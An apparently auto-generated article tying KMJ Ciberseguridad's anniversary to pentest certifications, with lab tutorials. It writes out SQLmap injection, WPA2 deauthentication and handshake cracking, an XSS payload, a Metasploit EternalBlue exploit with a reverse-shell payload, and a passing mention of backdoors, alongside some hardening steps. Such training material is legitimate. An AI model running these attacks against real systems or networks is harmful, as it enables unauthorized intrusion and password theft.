Listen to this Post

Introduction:
In a crowded field of cybersecurity startups, KMJ Ciberseguridad stands out—not just for its second anniversary, but for the passion and technical rigor behind its foundation. Founded by a group of friends united by a love for hacking, the company now serves small and medium enterprises with high‑standard security practices. Their story underscores a critical truth: in today’s threat landscape, hands‑on certifications like OSCP, OSEP, and OSWP are more than credentials—they are the bedrock of a successful security practice. This article breaks down the technical skills behind those certifications, providing actionable guides and commands to help you follow in their footsteps.
Learning Objectives:
- Understand the core certifications that drive modern penetration testing and how to prepare for them.
- Gain hands‑on experience with essential Linux/Windows commands and tools used in real‑world engagements.
- Learn how to translate technical expertise into a sustainable cybersecurity business model.
You Should Know
- The KMJ Ciberseguridad Story: From Passion to Profit
KMJ Ciberseguridad was born from a simple idea: build a company with high standards, best practices, and do it with friends. Two years later, they’ve grown steadily, helping SMEs secure their digital assets. The driving force? A shared obsession with hacking and a commitment to continuous learning—reflected in founder Francisco Melipin’s impressive certification list: OSEP, OSCP, OSWP, CWES, CPTS, eJPTv2, and eCPPTv2. Each certification represents a distinct skill set, from offensive security operations to wireless penetration testing. For aspiring professionals, this journey illustrates that a well‑rounded technical foundation is non‑negotiable. Below, we’ll dive into the practical side of these certifications, starting with the most foundational: OSCP.
2. Mastering Penetration Testing with OSCP and OSEP
The Offensive Security Certified Professional (OSCP) and Offensive Security Experienced Penetration Tester (OSEP) are gold standards for hands‑on hacking. Here’s a step‑by‑step guide to setting up a lab and executing a typical OSCP‑style attack.
Step 1: Build Your Lab
- Install Kali Linux (virtual machine or bare metal).
- Set up a target machine (e.g., Metasploitable 2 or a VulnHub VM).
- Ensure both are on the same NAT network.
Step 2: Enumeration
Use `nmap` to discover open ports and services:
nmap -sV -sC -O -p- <target_ip>
Example output might reveal port 80 (HTTP) and 22 (SSH).
Step 3: Web Application Exploitation
If a web server is running, use `gobuster` to find hidden directories:
gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Discover a vulnerable parameter and test with SQLmap:
sqlmap -u "http://<target_ip>/page.php?id=1" --dbs --batch
Step 4: Privilege Escalation
After gaining a low‑privilege shell (e.g., via a reverse shell), escalate privileges. On Linux, check for misconfigured sudo rights:
sudo -l
If you can run a command as root without a password, exploit it. On Windows, use tools like `winPEAS` to enumerate weaknesses.
Step 5: Post‑Exploitation
Maintain access with a Metasploit meterpreter or a custom backdoor. Document findings for the client report.
3. Wireless Penetration Testing with OSWP
The Offensive Security Wireless Professional (OSWP) focuses on attacking Wi‑Fi networks. Here’s how to crack a WPA2 handshake.
Step 1: Enable Monitor Mode
Put your wireless interface into monitor mode:
sudo airmon-ng start wlan0
Your interface becomes `wlan0mon`.
Step 2: Scan for Networks
List nearby access points and clients:
sudo airodump-ng wlan0mon
Identify the target BSSID and channel.
Step 3: Capture a Handshake
Focus on the target:
sudo airodump-ng -c <channel> --bssid <target_bssid> -w capture wlan0mon
Wait for a client to connect or force a deauthentication:
sudo aireplay-ng -0 2 -a <target_bssid> -c <client_mac> wlan0mon
Step 4: Crack the Handshake
Use `aircrack-ng` with a wordlist:
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
If successful, you now have the Wi‑Fi password.
4. Web Application Security with eJPTv2 and eCPPTv2
The eLearnSecurity certifications (now INE) emphasize practical web app testing. Let’s test for Cross‑Site Scripting (XSS) using Burp Suite.
Step 1: Configure Burp Proxy
- Open Burp Suite, go to Proxy → Options, ensure proxy is running on 127.0.0.1:8080.
- Set your browser to use this proxy.
Step 2: Map the Application
Navigate through the target site while Burp records requests in the Target tab.
Step 3: Find Input Vectors
Look for forms or URL parameters. In Burp Repeater, inject a simple XSS payload:
<script>alert('XSS')</script>
If the alert fires in your browser, you’ve found a reflected XSS.
Step 4: Automate with OWASP ZAP
ZAP can spider the site and automatically test for vulnerabilities. Run:
zap.sh -daemon -port 8081
Then use the ZAP API or desktop client to perform an active scan.
5. Cloud Hardening and API Security
Modern companies rely on cloud infrastructure. Here’s how to secure an AWS S3 bucket and test an API for flaws.
Step 1: Secure S3 Buckets
Use the AWS CLI to check bucket permissions:
aws s3api get-bucket-acl --bucket your-bucket-name
Ensure it’s not public. To block public access:
aws s3api put-public-access-block --bucket your-bucket-name --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
Step 2: API Security Testing with Postman
- Import the API collection.
- Send requests with unexpected inputs (e.g., SQLi payloads, oversized data).
- Use Postman’s test scripts to automate checks for status codes and response times.
Step 3: Use OWASP Amass for Subdomain Enumeration
Discover exposed API endpoints:
amass enum -d example.com
This helps identify shadow APIs that may be less secure.
6. Vulnerability Exploitation and Mitigation with Metasploit
Metasploit is a go‑to for demonstrating exploits. Here’s a simple example exploiting an unpatched Windows 7 machine (MS17‑010 EternalBlue).
Step 1: Launch Metasploit
msfconsole
Step 2: Search for the Exploit
search eternalblue
Select the appropriate module (e.g., exploit/windows/smb/ms17_010_eternalblue).
Step 3: Configure Options
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <target_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST <your_ip> run
If successful, you get a meterpreter shell.
Step 4: Mitigation
Apply the Microsoft patch (MS17‑010) and ensure SMBv1 is disabled:
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
7. Building a Cybersecurity Business: Lessons from KMJ
KMJ’s success isn’t just technical—it’s about teamwork, standards, and client trust. To replicate their growth:
- Develop a Niche: Focus on areas like pentesting, incident response, or compliance.
- Leverage Open Source: Use tools like the Elastic Stack for SIEM, Wazuh for HIDS, and TheHive for case management.
- Automate Reporting: Generate professional reports with tools like `pandoc` and custom templates.
- Continuous Learning: Encourage your team to pursue certifications (like those mentioned) and attend conferences.
- Build a Brand: Use LinkedIn and community engagement—like Francisco’s post—to showcase your expertise and attract clients.
What Undercode Say
- Certifications Are a Launchpad, Not a Destination: The KMJ team’s diverse certs (OSCP, OSEP, etc.) prove that hands‑on skills are essential, but real‑world business success requires combining them with entrepreneurship and teamwork.
- Practical Labs Beat Theory: Every command and tool covered here—from `nmap` to
aircrack‑ng—should be practiced in a controlled lab before facing client environments. - Community and Passion Drive Longevity: KMJ’s origin story reminds us that a shared passion for hacking can evolve into a sustainable company. In cybersecurity, collaboration often outshines competition.
Analysis: The cybersecurity industry is shifting toward specialization and automation, yet foundational skills remain irreplaceable. KMJ Ciberseguridad’s journey highlights the importance of blending deep technical knowledge with business acumen. As SMEs increasingly face sophisticated attacks, companies like KMJ are poised to fill the gap left by larger, less agile firms. Their use of respected certifications not only validates their expertise but also builds client confidence—a critical factor in a market where trust is currency.
Prediction
Within the next three years, we’ll see a surge in boutique cybersecurity firms founded by certification‑heavy practitioners. These firms will challenge traditional consultancies by offering more personalized, agile services. Meanwhile, the rise of AI‑driven attacks will force pentesters to incorporate machine learning into their toolkit—tools like `DeepExploit` and `Counterfit` will become standard. KMJ Ciberseguridad’s model of friendship‑based, high‑standard collaboration may well become the blueprint for the next generation of cybersecurity entrepreneurs.
▶️ Related Video (74% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Francisco Melipin – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


